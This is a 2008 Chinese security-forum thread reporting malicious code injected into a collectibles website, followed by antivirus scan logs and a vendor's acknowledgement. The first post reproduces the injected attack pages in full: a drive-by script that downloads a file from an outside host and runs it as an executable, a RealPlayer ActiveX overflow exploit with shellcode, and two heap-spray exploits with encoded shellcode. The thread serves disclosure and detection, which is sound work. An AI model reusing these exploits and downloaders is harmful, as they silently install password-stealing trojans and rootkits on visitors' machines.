【河北收藏网（http://www.hebeisc.org/）被插入恶意代码】

显示全部楼层 · 发表于 2008-5-26 14:42:10

河北收藏网（http://www.hebeisc.org/）被插入恶意代码：

①http://www.paopao550.cn/bak/1013.htm

②http://%66%6b%6f%6f%6d%6d%2e%63%6f%6d/103/【解码为：http://fkoomm.com/103/】

【1】http://www.paopao550.cn/bak/1013.htm内容：

<iframe src=../zzz.htm width=100 height=0></iframe>提取为：

http://www.paopao550.cn/bak/../zzz.htm，其内容为（解码部分省略）：

（1）http://www.paopao550.cn/bak/../14.htm，其内容为：

<script language="javaScript">
function gn(n)
{
var number = Math.random()*n; return '~tmp'+Math.round(number)+'.exe';
}
lj="http://www.paopao550.cn/ms.css";
try
{ aaa="o";
yyy="ct";
ccc="Adod";
ddd="b.Stream";
eee="Microsoft.XMLHTT"+"P";
ggg="o";
kkk="p";
mmm="e";
sss="n";
var df=document.createElement(aaa+"bje"+yyy);
df.setAttribute("classid","clsid:BD96C556-65A3-11D0-983A-00C04FC29E36");
var x=df.CreateObject(eee,"");
var S=df.CreateObject(ccc+ddd,"");
S.type=1;
x.open("GET", lj,0);
x.send();
mz1=gn(10000);
var F=df.CreateObject("Scripting.FileSystemObject","");
var tmp=F.GetSpecialFolder(0); mz1= F.BuildPath(tmp,mz1);
S.Open();
ttt=x.responseBody;
S.Write(ttt);
i=2;
S.SaveToFile(mz1,i); S.Close();
var Q=df.CreateObject("Shell.Application","");
exp1=F.BuildPath(tmp+'\\sys'+'tem32','cmd.exe');
Q["ShellE"+"xecute"](exp1,' /c '+mz1,"",ggg+kkk+mmm+sss,0);
} catch(i) { i=1; }
</script>

(2)http://www.paopao550.cn/bak/../rl.htm，其内容为：

<script>
var pao1="LLLL\\XXXXXLD";
var pao2=pao1;
var pao3="c:\\Program Files\\NetMeeti";
var pao4="ng\\..\\..\\WINDOWS\\Media\\chime";
var pao5="s.wav";
var pao6=pao3+pao4+pao5;
var pao7="c:\\Program Files\\Ne";
var pao8="tMeeting\\TestSn";
var pao9="d.wav";
var pao0=pao7+pao8+pao9;
var pps1="C:\\WINDOWS\\system32";
var pps2="\\BuzzingBee.wav";
var pps3=pps1+pps2;
var pps4="C:\\WINDOWS\\clock.avi";
var pps5="c:\\Program Files\\NetMeeting";
var pps6="\\..\\..\\WINDOWS\\Media\\tada.wav";
var pps7=pps5+pps6;
var paopaopaopaopaopaopao=pps7;
var pps8="C:\\WINDOWS\\syste";
var pps9="m32\\LoopyMusic.wav";
var pps0=pps8+pps9;
var sel1="IERPCtl.I";
var sel2="ERPCtl.1";
var sel3=sel1+sel2;
var x1="%75"+"%06"+"%74"+"%04";
var x2="%7f"+"%a5"+"%60";
var x3="%4f"+"%71"+"%a4"+"%60";
var x4="%63"+"%11"+"%08"+"%60";
var x5="%63"+"%11"+"%04"+"%60";
var x6="%79"+"%31"+"%01"+"%60";
var x7="%79"+"%31"+"%09"+"%60";
var x8="%51"+"%11"+"%70"+"%63";
var pplive=[x1,x2,x3,x4,x5,x6,x7,x8];
</script><script>
function RealExploit()
{
var user=navigator.userAgent["toLowerCase"]();
if(user.indexOf("msie 6")==-1&&user.indexOf("msie 7")==-1) return;
if(user.indexOf("nt 5.")==-1) return;
creobj=sel3;
try{ Realpao = new window["ActiveXObject"](creobj); }
catch(error){ return; }
RealVersion = Realpao.PlayerProperty("PRODUCTVERSION");
var reading="";
var tiaozhuan=unescape(pplive[0]);
var fanhui;
for(i=0;i<32*148;i++)
  reading+="S";
if(RealVersion.indexOf("6.0.14.")==-1)
{
  if(navigator.userLanguage.toLowerCase()=="zh-cn") fanhui=unescape(pplive[1]);
  else if(navigator.userLanguage.toLowerCase()=="en-us") fanhui=unescape(pplive[2]);
  else return;
}
else if(RealVersion=="6.0.14.544") fanhui=unescape(pplive[3]);
else if(RealVersion=="6.0.14.550") fanhui=unescape(pplive[4]);
else if(RealVersion=="6.0.14.552") fanhui=unescape(pplive[5]);
else if(RealVersion=="6.0.14.543") fanhui=unescape(pplive[6]);
else if(RealVersion=="6.0.14.536") fanhui=unescape(pplive[7]);
else return;
if(RealVersion.indexOf("6.0.10.")!=-1)
{
  for(i=0;i<4;i++)
reading=reading+tiaozhuan;
reading=reading+fanhui;
}
else if(RealVersion.indexOf("6.0.11.")!=-1)
{
  for(i=0;i<6;i++)
reading=reading+tiaozhuan;
reading=reading+fanhui;
}
else if(RealVersion.indexOf("6.0.12.")!=-1)
{
  for(i=0;i<9;i++)
reading=reading+tiaozhuan;
reading=reading+fanhui;
}
else if(RealVersion.indexOf("6.0.14.")!=-1)
{
  for(i=0;i<10;i++)
reading=reading+tiaozhuan;
reading=reading+fanhui;
}
var pplivecode="";
pplivecode=pplivecode+"TYIIIIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJIxkR0qJPJP3YY0fNYwLEQk0p47zpf";
pplivecode=pplivecode+"KRKJJKVe9xJKYoIoYolOoCQv3VsVwLuRKwRvavbFQvJM";
pplivecode=pplivecode+"WVsZzMFv0z8K8mwVPnxmmn8mDUBzJMEBsHuN3ULUhmfx";
pplivecode=pplivecode+"W6peMMZM7XPrf5NkDpP107zMpYE5MMzMj44LqxGONuKp";
pplivecode=pplivecode+"TRrNWOVYM5mqqrwSMTnoeoty08JMnKJMgPw2pey5MgMW";
pplivecode=pplivecode+"QuMwrunOgp8mpn8m7PrZBEleoWng2DRELgZMU6REoUJM";
pplivecode=pplivecode+"mLHmz1KUOPCXHmLvflsRWOLNvVrFPfcVyumpRKp4dpJ9VQMJUlxmmnTL2GWOLNQKe6pfQvXeMpPuVPwP9v0XzFr3Ol9vRpzFDxm5NjqVxmLzdLSvTumI5alJMqqrauWJUWrhS3OQWRU5QrENVcE61vPUOVtvTv4uP0DvLYfQOjZMoJP6eeMIvQmF5fLYP1nrQEmvyZkSnFtSooFWTtTpp5oinTWLgOzmMTk8PUoVNENnW0J9mInyWQS3TRGFVt6iEUTgtBwrtTs3r5r5PfEqTCuBgEGoDUtR4CfkvB4OEDc3UUGbVib4Wo5we6VQVouXdcENeStEpfTc7nVoUBdrfnvts3c77r3VwZwyGw7rdj4OS4DTww6tuOUw2F4StTUZvkFiwxQvtsud7Z6BviR1gxUZ4IVgTBfRWygPfouZtCwWqvRHptd4RPFZVOdoRWQgrWTnPp0a2ORP3QPoduueTp4nsSrN4oPmRSTnU3PspsOpgp";
realzh=reading+pao2+pplivecode;
temp=0x8000; while(realzh["length"] < temp) realzh+="hohoho";
      var paopaopao=pao6;
var arr1=[pao6,pao0,pps3,pps4,pps7,pps0];
Realpao["import"](arr1[Math.floor(Math["random"]()*6)], realzh, "", 0, 0);
}
RealExploit();
</script>

(3)http://www.paopao550.cn/bak/../new.htm，其内容为：

<html><body>
<object classid="clsid:2F542A2E-EDC9-4BF7-8CB1-87C9919F7F93" id="Silent"></object>
<script language="JavaScript">
var pao0 ="pao7468pao7074pao2f3apao772fpao7777pao702epao6f61pao6170pao356fpao3035pao632epao2f6epao736dpao632epao7373";
var pao1="pao9090pao6090pao17ebpao645epao30a1pao0000pao0500pao0800pao0000paof88bpao00b9";
var pao2="pao0004paof300paoffa4paoe8e0paoffe4paoffffpaoa164pao0030pao0000pao408bpao8b0c";
var pao3="pao1c70pao8badpao0870paoec81pao0200pao0000paoec8bpaoe8bbpao020fpao8b00pao8503";
var pao4="pao0fc0paobb85pao0000paoff00paoe903pao0221pao0000pao895bpao205dpao6856paofe98";
var pao5="pao0e8apaob1e8pao0000pao8900pao0c45pao6856pao4e8epaoec0epaoa3e8pao0000pao8900";
var pao6="pao0445pao6856pao79c1paob8e5pao95e8pao0000pao8900pao1c45pao6856paoc61bpao7946";
var pao7="pao87e8pao0000pao8900pao1045pao6856paofcaapao7c0dpao79e8pao0000pao8900pao0845";
var pao8="pao6856pao84e7paob469pao6be8pao0000pao8900pao1445paoe0bbpao020fpao8900pao3303";
var pao9="paoc7f6pao2845pao5255pao4d4cpao45c7pao4f2cpao004epao8d00pao285dpaoff53pao0455";
</script>
<script language="JavaScript">
var pao10="pao6850pao1a36pao702fpao3fe8pao0000pao8900pao2445pao7f6apao5d8dpao5328pao55ff";
var pao11="paoc71cpao0544pao5c28pao652epaoc778pao0544pao652cpao0000pao5600pao8d56pao287d";
var pao12="paoff57pao2075paoff56pao2455pao5756pao55ffpaoe80cpao0062pao0000paoc481pao0200";
var pao13="pao0000pao3361paoc2c0pao0004pao8b55pao51ecpao8b53pao087dpao5d8bpao560cpao738b";
var pao14="pao8b3cpao1e74pao0378pao56f3pao768bpao0320pao33f3pao49c9paoad41paoc303pao3356";
var pao15="pao0ff6pao10bepaof23apao0874paocec1pao030dpao40f2paof1ebpaofe3bpao755epao5ae5";
var pao16="paoeb8bpao5a8bpao0324pao66ddpao0c8bpao8b4bpao1c5apaodd03pao048bpao038bpao5ec5";
var pao17="pao595bpaoc25dpao0008pao92e9pao0000pao5e00pao80bfpao020cpaob900pao0100pao0000";
var pao18="paoa4f3paoec81pao0100pao0000paofc8bpaoc783paoc710pao6e07pao6474paoc76cpao0447";
var pao19="pao006cpao0000paoff57pao0455pao4589paoc724pao5207pao6c74paoc741pao0447pao6c6c";
var pao20="pao636fpao47c7pao6108pao6574paoc748pao0c47pao6165pao0070pao5057pao55ffpao8b08";
var pao21="paob8f0pao0fe4pao0002pao3089pao07c7pao736dpao6376pao47c7pao7204pao0074pao5700";
var pao22="pao55ffpao8b04pao3c48pao8c8bpao8008pao0000pao3900pao0834pao0474paof9e2pao12eb";
var pao23="pao348dpao5508pao406apao046apaoff56pao1055pao06c7pao0c80pao0002paoc481pao0100";
var pao24="pao0000paoe8c3paoff69paoffffpao048bpao5324pao5251pao5756paoecb9pao020fpao8b00";
var pao25="pao8519pao75dbpao3350pao33c9pao83dbpao06e8paob70fpao8118paofffbpao0015pao7500";
var pao26="pao833epao06e8paob70fpao8118paofffbpao0035pao7500pao8330pao02e8paob70fpao8318";
var pao27="pao6afbpao2575paoc083pao8b04paob830pao0fe0pao0002pao0068pao0000pao6801pao1000";
var pao28="pao0000pao006apao10ffpao0689pao4489pao1824paoecb9pao020fpaoff00pao5f01pao5a5e";
var pao29=pao1+pao2+pao3+pao4+pao5+pao6+pao7+pao8+pao9+pao10+pao11+pao12+pao13;
var pao30=pao14+pao15+pao16+pao17+pao18+pao19+pao20+pao21+pao22+pao23+pao24;
var pao31="pao90"+"90pao"+"90"+"90"+pao29+pao30+pao25+pao26+pao27+pao28+"pao5b59paoe4b8pao020fpaoff00paoe820paofddapaoffff";
var pao32=pao31+pao0;
</script>
<script language="JavaScript">
var Paoyezuiai = unescape(pao32.replace(/pao/g,"\x25\x75"));
var bigblock = unescape("%u0"+"C0C%u0C"+"0C");
var headersize = 20;
var shell=slackspace;
var slackspace = headersize + Paoyezuiai.length;
while (bigblock.length < slackspace) bigblock += bigblock;
var fillblock = bigblock.substring(0,slackspace);
var block = bigblock.substring(0,bigblock.length - slackspace);
while (block.length + slackspace < 0x40000) block = block + block + fillblock;
var memory = new Array();
for (i = 0; i < 400; i++){ memory = block + Paoyezuiai }
var buf = '';
while (buf.length < 32) buf = buf + unescape("%0"+"C");
var m = '';
m = Silent.Console;
Silent.Console = buf;
Silent.Console = m;
m = Silent.Console;
Silent.Console = buf;
Silent.Console = m;
</script>
</body></html>

(4)http://www.paopao550.cn/bak/../lz.htm，其内容为：

<html>
<object classid="clsid:F917534D-535B-416B-8E8F-0C04756C31A8" id='Silent'></object>
<body>
<SCRIPT language="javascript">
var pps1="pao758bpao8b3cpao3574pao0378pao56f5pao768bpao0320pao33f5pao49c9";
var pps2="paoad41paodb33pao0f36pao14bepao3828pao74f2paoc108pao0dcbpaoda03";
var pps3="paoeb40pao3befpao75dfpao5ee7pao5e8bpao0324pao66ddpao0c8bpao8b4b";
var pps4="pao1c5epaodd03pao048bpao038bpaoc3c5pao7275pao6d6cpao6e6fpao642e";
var pps5="pao6c6cpao4300pao5c3apao2e55pao7865pao0065paoc033pao0364pao3040";
var pps6="pao0c78pao408bpao8b0cpao1c70pao8badpao0840pao09ebpao408bpao8d34";
</script>
<SCRIPT language="JavaScript">
var pps7="pao7c40pao408bpao953cpao8ebfpao0e4epaoe8ecpaoff84paoffffpaoec83";
var pps8="pao8304pao242cpaoff3cpao95d0paobf50pao1a36pao702fpao6fe8paoffff";
var pps9="pao8bffpao2454pao8dfcpaoba52paodb33pao5353paoeb52pao5324paod0ff";
var pao1="paobf5dpaofe98pao0e8apao53e8paoffffpao83ffpao04ecpao2c83pao6224";
var pao2="paod0ffpao7ebfpaoe2d8paoe873paoff40paoffffpaoff52paoe8d0paoffd7";
var pao3="pao772fpao7777pao702epao6f61pao6170pao356fpao3035pao632epao2f6epao736dpao632epao7373";
var pao4=pps1+pps2+pps3+pps4+pps5+pps6+pps7+pps8+pps9+pao1+pao2;
var pao5="pao90"+"90pao9"+"090pao54"+"eb"+pao4+"paoffffpao74"+"68pao7074pao2f3a"+pao3;
</script>
<SCRIPT language="JavaScript">
var Paoyezuiai = unescape(pao5.replace(/pao/g,"\x25\x75"));
var s1="IEStar"+"tNative";
var nop = "tmp9090tm"+"p9090";
var z1="fuck"+"you";
var s2="zhulan"+"gdaniu";
</script>
<SCRIPT language="JavaScript">
var Paoye = unescape(nop.replace(/tmp/g,"%u"));
while (Paoye.length<224) Paoye+=Paoye;
filllen = Paoye.substring(0, 224);
len = Paoye.substring(0, Paoye.length-224);
while(len.length+224<0x40000) len = len+len+filllen;
var paopao=new Array();
var paoye1=paopao;
for (x=0; x<300; x++) paoye1[x] = len +Paoyezuiai;
var hellohack = '';
while (hellohack.length < 600) hellohack+='\x0a\x0a\x0a\x0a';
Silent[s1](hellohack,s2,z1);
</script>
</body>
</html>

(5)http://www.paopao550.cn/bak/../bf.htm【连接超时】

(6)http://www.paopao550.cn/bak/../xl.htm【连接超时】

<script src='http://s86.cnzz.com/stat.php?id=892221&web_id=892221' language='JavaScript' charset='gb2312'></script>提取为：

http://s86.cnzz.com/stat.php?id=892221&web_id=892221，其内容为：

(1)http://www.cnzz.com/stat/website.php?web_id=892221:

<script>location.href='login.php?webid=892221';</script>

(2)http://222.77.187.238/stat.htm?id=892221:

Power by Cnzz

【2】http://fkoomm.com/103/【超级汗颜，暂时找不到服务器】

【3】只好上传那个htm文件给大家杀杀
hebeisc[1].rar (10.77 KB, 下载次数: 165)

显示全部楼层 · 发表于 2008-5-26 14:48:36

Starting the file scan:

Begin scan in 'E:\AV\ms.css'
E:\AV\ms.css
   [DETECTION] Is the Trojan horse TR/Crypt.Delf.D.77
   [NOTE]    The file was deleted!

Starting the file scan:
Begin scan in 'E:\AV\14.htm'
Begin scan in 'E:\AV\1013.htm'
Begin scan in 'E:\AV\bf.htm'
Begin scan in 'E:\AV\lz.htm'
Begin scan in 'E:\AV\new.htm'
E:\AV\new.htm
   [DETECTION] Contains suspicious code HEUR/HTML.Malware
   [NOTE]    The fund was classified as suspicious.
   [NOTE]    The file was moved to '48b1600e.qua'!
Begin scan in 'E:\AV\rl.htm'
E:\AV\rl.htm
   [DETECTION] Contains detection pattern of the Java script virus JS/Agent.ES
   [NOTE]    The file was deleted!
Begin scan in 'E:\AV\xl.htm'
Begin scan in 'E:\AV\zzz.htm'

End of the scan: 2008年5月26日  14:58
Used time: 00:11 min
The scan has been done completely.
   0 Scanning directories
   8 Files were scanned
   1 viruses and/or unwanted programs were found
   1 Files were classified as suspicious:
   1 files were deleted
   0 files were repaired
   1 files were moved to quarantine
   0 files were renamed
   0 Files cannot be scanned
   7 Files not concerned
   0 Archives were scanned
   0 Warnings
   2 Notes

[ 本帖最后由 Exia 于 2008-5-26 14:56 编辑 ]

显示全部楼层 · 发表于 2008-5-26 16:22:21

随便解了一个，顺便枚举了下，找到30个下载来的，其中的ms.css是个PE文件，下载者

样本：

11.rar (541.65 KB, 下载次数: 186)

显示全部楼层 · 发表于 2008-5-26 16:27:42

Starting the file scan:

Begin scan in 'E:\AV\11'
E:\AV\11\1.exe
   [DETECTION] Is the Trojan horse TR/Spy.Gen
   [NOTE]    The file was deleted!
E:\AV\11\10.exe
   [DETECTION] Is the Trojan horse TR/ATRAPS.Gen
   [NOTE]    The file was deleted!
E:\AV\11\11.exe
   [DETECTION] Is the Trojan horse TR/Spy.Gen
   [NOTE]    The file was deleted!
E:\AV\11\12.exe
   [DETECTION] Is the Trojan horse TR/Crypt.XDR.Gen
   [NOTE]    The file was deleted!
E:\AV\11\13.exe
   [DETECTION] Is the Trojan horse TR/Crypt.XDR.Gen
   [NOTE]    The file was deleted!
E:\AV\11\14.exe
   [DETECTION] Is the Trojan horse TR/Crypt.XDR.Gen
   [NOTE]    The file was deleted!
E:\AV\11\15.exe
   [DETECTION] Is the Trojan horse TR/Crypt.XDR.Gen
   [NOTE]    The file was deleted!
E:\AV\11\16.exe
   [DETECTION] Is the Trojan horse TR/Crypt.XDR.Gen
   [NOTE]    The file was deleted!
E:\AV\11\17.exe
   [DETECTION] Is the Trojan horse TR/Spy.Gen
   [NOTE]    The file was deleted!
E:\AV\11\18.exe
   [DETECTION] Is the Trojan horse TR/Crypt.XDR.Gen
   [NOTE]    The file was deleted!
E:\AV\11\19.exe
   [DETECTION] Is the Trojan horse TR/Dropper.Gen
   [NOTE]    The file was deleted!
E:\AV\11\2.exe
   [DETECTION] Is the Trojan horse TR/Dropper.Gen
   [NOTE]    The file was deleted!
E:\AV\11\20.exe
   [DETECTION] Is the Trojan horse TR/Crypt.XDR.Gen
   [NOTE]    The file was deleted!
E:\AV\11\21.exe
   [DETECTION] Is the Trojan horse TR/Crypt.XDR.Gen
   [NOTE]    The file was deleted!
E:\AV\11\22.exe
   [DETECTION] Is the Trojan horse TR/Spy.Gen
   [NOTE]    The file was deleted!
E:\AV\11\23.exe
   [DETECTION] Is the Trojan horse TR/Crypt.XDR.Gen
   [NOTE]    The file was deleted!
E:\AV\11\24.exe
   [DETECTION] Is the Trojan horse TR/Spy.Gen
   [NOTE]    The file was deleted!
E:\AV\11\25.exe
   [DETECTION] Is the Trojan horse TR/Spy.Gen
   [NOTE]    The file was deleted!
E:\AV\11\26.exe
   [DETECTION] Is the Trojan horse TR/Crypt.XDR.Gen
   [NOTE]    The file was deleted!
E:\AV\11\27(1).exe
   [DETECTION] Is the Trojan horse TR/Spy.Gen
   [NOTE]    The file was deleted!
E:\AV\11\27.exe
--> Object
   [1] Archive type: RSRC
   --> Object
      [DETECTION] Contains detection pattern of the rootkit RKIT/Agent.ait.1
   [DETECTION] Is the Trojan horse TR/Spy.Gen
   [NOTE]    The file was deleted!
E:\AV\11\28.exe
   [DETECTION] Is the Trojan horse TR/Crypt.XDR.Gen
   [NOTE]    The file was deleted!
E:\AV\11\29.exe
   [DETECTION] Is the Trojan horse TR/Spy.Gen
   [NOTE]    The file was deleted!
E:\AV\11\3.exe
   [DETECTION] Is the Trojan horse TR/Crypt.XDR.Gen
   [NOTE]    The file was deleted!
E:\AV\11\30.exe
   [DETECTION] Is the Trojan horse TR/Crypt.XDR.Gen
   [NOTE]    The file was deleted!
E:\AV\11\31.exe
   [DETECTION] Is the Trojan horse TR/Spy.Gen
   [NOTE]    The file was deleted!
E:\AV\11\4.exe
   [DETECTION] Is the Trojan horse TR/Spy.Gen
   [NOTE]    The file was deleted!
E:\AV\11\5.exe
   [DETECTION] Is the Trojan horse TR/Dropper.Gen
   [NOTE]    The file was deleted!
E:\AV\11\6.exe
   [DETECTION] Is the Trojan horse TR/Spy.Gen
   [NOTE]    The file was deleted!
E:\AV\11\7.exe
   [DETECTION] Is the Trojan horse TR/Dropper.Gen
   [NOTE]    The file was deleted!
E:\AV\11\8.exe
   [DETECTION] Is the Trojan horse TR/Dropper.Gen
   [NOTE]    The file was deleted!
E:\AV\11\9.exe
--> Object
   [1] Archive type: RSRC
   --> Object
      [DETECTION] Is the Trojan horse TR/PSW.OnlineGames.ajne
   [NOTE]    The file was deleted!
E:\AV\11\ms.css
   [DETECTION] Is the Trojan horse TR/Crypt.Delf.D.77
   [NOTE]    The file was deleted!

End of the scan: 2008年5月26日  16:29
Used time: 00:21 min

The scan has been done completely.

   1 Scanning directories
   33 Files were scanned
   34 viruses and/or unwanted programs were found
   0 Files were classified as suspicious:
   33 files were deleted
   0 files were repaired
   0 files were moved to quarantine
   0 files were renamed
   0 Files cannot be scanned
   -1 Files not concerned
   0 Archives were scanned
   0 Warnings
   33 Notes

显示全部楼层 · 发表于 2008-5-26 18:05:16

信息 2008-05-26  18:05:04 您此次查毒清除了30个病毒
信息 2008-05-26  18:05:04 您此次查毒共查出30个病毒以及危险代码
信息 2008-05-26  18:05:04 您此次查毒共查了内存模块0个，磁盘引导扇区0个，文件71个
信息 2008-05-26  18:05:04 金山毒霸主程序查毒过程结束，查毒方式：命令行查毒

显示全部楼层 · 发表于 2008-5-26 18:12:36

ArcaVir
[Scanning : C:\Documents and Settings\All Users\Documents\Test]

C:\Documents and Settings\All Users\Documents\Test\11.rar<RAR>:27.exe<UPX>:27.exe <- Trojan.Psw.Onlinegames.Abbh : No action
C:\Documents and Settings\All Users\Documents\Test\11.rar<RAR>:27.exe<UPX>:27.exe<DLLRES>:res0.exe<UPack>:res0.exe <- Trojan.Psw.Onlinegames.Abha : No action
C:\Documents and Settings\All Users\Documents\Test\11.rar<RAR>:27.exe<UPX>:27.exe<DLLRES>:res1.exe <- Trojan.Rootkit.Agent.Ait : No action

Scanned objects : 89

Infected objects : 3

显示全部楼层 · 发表于 2008-5-26 18:13:45

[Found possible security risk] <W32/Heuristic-KPP!Eldorado (not disinfectable)> C:\Documents and Settings\All Users\Documents\Test\11.rar->11\1.exe->(UPX)

---------------------------------------------------------------------
Scan ended: 2008-5-26, 18:13:00
Duration: 0:00:02

Scan result:

Scanned files:    6
Infected objects:    1
Disinfected objects:    0
Quarantined files:    0
---------------------------------------------------------------------

显示全部楼层 · 发表于 2008-5-26 18:16:07

Scan performed at: 2008/5/26 18:16:31
Scanning Log
NOD32 version 3130 (20080526) NT
Command line: G:\v\11.rar
C:\Program Files\Eset\nod32.exe - is OK

Date: 26.5.2008 Time: 18:16:33
Anti-Stealth technology is enabled.
Scanned disks, folders and files: G:\v\11.rar
G:\v\11.rar ?RAR ?11\1.exe ?UPX v12_m2 - is OK
G:\v\11.rar ?RAR ?11\10.exe - probably a variant of Win32/PSW.OnLineGames.NWB trojan
G:\v\11.rar ?RAR ?11\11.exe - probably a variant of Win32/Genetik trojan
G:\v\11.rar ?RAR ?11\12.exe - probably a variant of Win32/PSW.OnLineGames.NML trojan
G:\v\11.rar ?RAR ?11\13.exe - probably a variant of Win32/PSW.OnLineGames.NML trojan
G:\v\11.rar ?RAR ?11\14.exe - probably a variant of Win32/PSW.OnLineGames.NML trojan
G:\v\11.rar ?RAR ?11\15.exe - probably a variant of Win32/PSW.OnLineGames.NML trojan
G:\v\11.rar ?RAR ?11\16.exe - probably a variant of Win32/PSW.OnLineGames.NML trojan
G:\v\11.rar ?RAR ?11\17.exe - probably a variant of Win32/Genetik trojan
G:\v\11.rar ?RAR ?11\18.exe - probably a variant of Win32/PSW.OnLineGames.NML trojan
G:\v\11.rar ?RAR ?11\19.exe - is OK
G:\v\11.rar ?RAR ?11\2.exe - is OK
G:\v\11.rar ?RAR ?11\20.exe - probably a variant of Win32/PSW.OnLineGames.NML trojan
G:\v\11.rar ?RAR ?11\21.exe - probably a variant of Win32/PSW.OnLineGames.NML trojan
G:\v\11.rar ?RAR ?11\22.exe - probably a variant of Win32/Genetik trojan
G:\v\11.rar ?RAR ?11\23.exe - probably a variant of Win32/PSW.OnLineGames.NML trojan
G:\v\11.rar ?RAR ?11\24.exe - probably a variant of Win32/Genetik trojan
G:\v\11.rar ?RAR ?11\25.exe - probably a variant of Win32/Genetik trojan
G:\v\11.rar ?RAR ?11\26.exe - probably a variant of Win32/PSW.OnLineGames.NML trojan
G:\v\11.rar ?RAR ?11\27(1).exe - probably a variant of Win32/Genetik trojan
G:\v\11.rar ?RAR ?11\27.exe - a variant of Win32/PSW.OnLineGames.NWB trojan
G:\v\11.rar ?RAR ?11\28.exe - probably a variant of Win32/PSW.OnLineGames.NML trojan
G:\v\11.rar ?RAR ?11\29.exe - probably a variant of Win32/Genetik trojan
G:\v\11.rar ?RAR ?11\3.exe - probably a variant of Win32/PSW.OnLineGames.NML trojan
G:\v\11.rar ?RAR ?11\30.exe - probably a variant of Win32/PSW.OnLineGames.NML trojan
G:\v\11.rar ?RAR ?11\31.exe - probably a variant of Win32/Genetik trojan
G:\v\11.rar ?RAR ?11\4.exe - probably a variant of Win32/Genetik trojan
G:\v\11.rar ?RAR ?11\5.exe - is OK
G:\v\11.rar ?RAR ?11\6.exe - probably a variant of Win32/Genetik trojan
G:\v\11.rar ?RAR ?11\7.exe - is OK
G:\v\11.rar ?RAR ?11\8.exe - is OK
G:\v\11.rar ?RAR ?11\9.exe - probably a variant of Win32/PSW.OnLineGames.NWC trojan
G:\v\11.rar ?RAR ?11\ms.css - is OK
G:\v\11.rar:Zone.Identifier - is OK
Number of scanned files: 34
Number of threats found: 26
Time of completion: 18:16:39 Total scanning time: 6 sec (00:00:06)

显示全部楼层 · 发表于 2008-5-26 19:00:10

TO KL

显示全部楼层 · 发表于 2008-5-26 20:13:47

Hello.
New malicious software was found in the attached file.
It's detection will be included in the next update. Thank you for your help.
-----------------
Regards, Namestnikov Yury
Virus Analyst, Kaspersky Lab.

Ph.: +7(095) 797-8700
E-mail: newvirus@kaspersky.com
http://www.kaspersky.com http://www.viruslist.com

[:1:]

[已鉴定] 【河北收藏网（http://www.hebeisc.org/）被插入恶意代码】

回复 3楼 zzh161 的帖子

回复 3楼 zzh161 的帖子

F-Prot 4.4.4